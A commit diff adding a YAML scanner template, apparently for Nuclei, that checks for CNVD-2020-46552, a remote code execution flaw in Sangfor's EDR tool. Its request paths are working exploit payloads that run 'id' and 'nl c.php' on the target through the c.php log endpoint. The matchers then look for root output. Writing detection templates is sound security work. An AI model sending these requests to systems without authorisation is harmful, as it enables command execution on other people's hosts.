Create CNVD-2020-46552.yaml

cnvd/2020/CNVD-2020-46552.yaml

@@ -0,0 +1,35 @@
+id: CNVD-2020-46552
+info:
+  name: Sangfor EDR Tool RCE
+  author: ritikchaddha
+  severity: critical
+  description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
+  reference:
+    - https://www.modb.pro/db/144475
+    - https://blog.csdn.net/bigblue00/article/details/108434009
+    - https://cn-sec.com/archives/721509.html
+  tags: cnvd,cnvd2020,sangfor,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id"
+      - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "$show_input = function($info)"
+          - "$strip_slashes($host)"
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - "uid=0(root)"
+
+      - type: status
+        status:
+          - 200